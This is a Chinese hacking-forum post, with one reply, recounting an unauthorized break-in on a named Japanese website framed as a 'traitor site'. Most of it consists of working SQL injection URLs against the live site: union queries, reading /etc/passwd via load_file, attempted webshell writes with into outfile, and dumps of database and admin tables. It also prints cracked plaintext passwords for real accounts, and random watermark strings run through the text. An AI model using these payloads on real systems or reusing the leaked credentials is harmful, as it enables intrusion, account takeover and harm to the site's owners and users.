中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试
: N  ?9 U8 c: G6 m7 w) B
. V6 ?9 ?: b9 P% Y$ A3 Q- l: l
0x01. 检测 www.zuaa.jp 收集数据
, T2 B/ g9 U/ ~' ?6 Y' d% [+ U5 b4 G[attach]73[/attach]: i. x2 _: g9 P% y" |3 B7 O
# e, ~+ t- B( @: F( F
whatweb4 M: f" V4 P8 B; X. j
[attach]74[/attach]6 \# P( d0 k5 T$ V3 V

& U) ?9 T* A( E. m" i# b9 d4 V利用NMAP扫描' X1 h: T0 |) V% L. K4 U# j
[attach]75[/attach]
8 F* I9 }  j9 t& o6 Q% _/ ?2 y7 R中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持4 A1 m* k" A* H+ _) R" @
0x02.找注入点/ U$ J1 F& Z6 Q
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3906 ?, Z& S' S3 ]. G, ~
[attach]76[/attach]8 F) R8 l7 m. w0 G3 z( ^

: g' F  e$ e- X0 P4 @0 c# J# A5 [- a0x03.order by) Z. o; Y1 P8 w& G
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
7 Y5 D, Y' g& B# N2 f3 ]4 X, V- R& }[attach]77[/attach]! P3 L0 _8 G8 b5 H& ]- ^! ]$ k/ y
order by 28报错,order by 27正常
) Q" j4 L4 x% R3 S, D2 j2 z  [/ }" [7 j' n
0x04.   union手动查询
  e5 D  h) }7 Q) K5 j9 \; bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 a/ {( g+ r7 k8 a添加到 27 时正常显示
" W* z  |6 U$ N! e2 G( G) y, c  `[attach]78[/attach]9 X3 @: [0 B) A  n
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
* h5 Y* |0 i, E1 K7 o
+ b8 w' ~& u7 c6 r# D* E0x05. info:
# d1 w" K1 Q& r2 `, z. X4 jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ; h% X+ H% ~9 f) y
[attach]79[/attach]( E5 x" `, P  R; E  _& Z
user:            root@localhost$ Q  ?$ O8 P$ f9 i. [9 Q5 o
database:    openpne
5 |8 [) B4 }1 }" d' }: J/ e& J' _version:      4.1.22
0 e! M' L1 b7 j2 {4 s1 {os:             portbld-freebsd5.4$ @) A5 a$ q4 W( M

$ m# d, R+ a2 J, x* s0x06. root用户
+ `: b/ Z6 E6 E9 X1 h& T利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站): a0 g4 ~  p4 s% Y6 b  z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" @4 ?$ @. P; F; z0 Q+ k[attach]80[/attach]* k/ b% D! ~  }2 i- d$ Q
通过工具转换
$ A" J' k) E: Z& O; d6 a[attach]81[/attach]
7 p% x  X4 j9 N# J( S% t中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- a* V+ k* j+ ^7 O9 d

0 ]" p' }! ^  x- H9 S- |0x07. 利用 into outfile) l/ R1 P% U+ f: q  a/ C: N
全部都失败: j7 E) |$ J. W8 ?
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
$ G& M8 n1 L! K  N2 m8 d; A
# l  F% u# k- yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 0 N4 w/ r: K$ `: C$ J  Y% ?
# {  e5 @8 Z* C( t2 h! Q
页面显示“MDB2 Error:syntax error”
9 a; a5 h$ M) O+ j/ i1 S% G' z9 l8 Z
0x08. 利用 mysql 4.1& ~$ H, }: I; g4 F4 h
猜常规表名,字段未果 工具 sqlmap
5 ^6 R; @! ~( K+ A8 M中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 T& @- F. ?7 T% e! p

; M1 O/ D/ E6 C[attach]82[/attach]
& B  c) w" F4 ~2 i
% D; l9 }7 B  j. H+ ?0x09. 查找后台
$ [. b, G5 ~0 z利用 现有的各种 后台工具尝试都不行
1 @5 z- `- B7 D$ ~; a2 b  ~9 g$ s5 }5 H; J+ |3 F% n% w) O1 p
0x10.  MySL外联方法* E& D- F) J  t6 o( o/ b
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行4 J- @! \0 c" o
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
# G9 \  E* ]5 w% ^& Y1 ]6 H$ Mhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
5 D: s, O; ]# Q: H( X, @[attach]83[/attach]/ F+ Z6 a3 d0 W
这个可以在 www.cmd5.com 解密
0 d- p1 |# K$ I  E! [- G$ v2 Wroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
& ~" }3 w. S2 t9 M- U( C" E: M+ lchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
( E( y% ]& E4 A) H- k2 z+ Topenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
8 c0 O$ t* L; |! Y: z# k  N) qzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
( E& ^. t3 c# K  d0 [- c工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知9 w( i0 j* K# o9 @, @. y
[attach]84[/attach]1 I( T2 U0 T+ w( x! \1 `" @; A

: k3 H# F* k1 I( @) ]9 i9 x0x11. 网站突破
7 @; ]+ F3 d- }8 e4 s发现网站的源程序 openpne, google 下载 openpne 源码
% C  t) X5 @/ I. s2 D* y9 b) `7 F[attach]85[/attach], O' x) }3 r- s5 f2 u" a* \
: G  g7 O, @. L: d0 Q1 K0 `  b
0x12. 默认信息利用; [) l4 V/ L  P* w4 r9 {3 m8 j/ M
http://sns.zuaa.jp/?m=admin&a=page_login
; D4 I3 @5 ~' @; s[attach]86[/attach]4 C3 I: g- T7 J! P3 f5 W# P  ~, D
表名 (c_admin_user) ,字段名(username,password)8 j+ `; d, V; n0 l$ H/ b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 P4 ^) H# Q$ k: z, F1 ~[attach]87[/attach]
2 S1 P3 U9 `: J" }- r( A( w解密) N6 c) j' |/ o* t# }) y$ P! ~
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
3 f4 A5 b0 [# G8 L8 x; Izuaajp:c0923ec5857796a393da99905008c176,          zju18977 W/ z. L: H# @$ ]
  g! X  w/ T) q( ~4 x% o* F
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
$ u, }$ n# |8 l# @! g
+ h3 i+ |$ D. j" _  i0x13. 登录后台
* C) r" F3 {) D1 m5 R[attach]88[/attach]  N  W! x. p6 g! r3 n
% G  m; ~! S" g" u6 U! N9 k6 q

/ F( c' ~/ T! R0x14. 小结
: Y( D, s( ~1 `; u" ^! C3 C利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
/ m% z3 W2 ]! w2 P- i' L8 T感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
4 c6 u. p! x5 ]8 M8 q9 W------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
- t* d$ y( n0 M中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持! k. |' }# v# B, b$ n. K

- ?4 j- Z! h) l. u% K最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
) J3 k  z; Z0 k, g: x) K( L
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2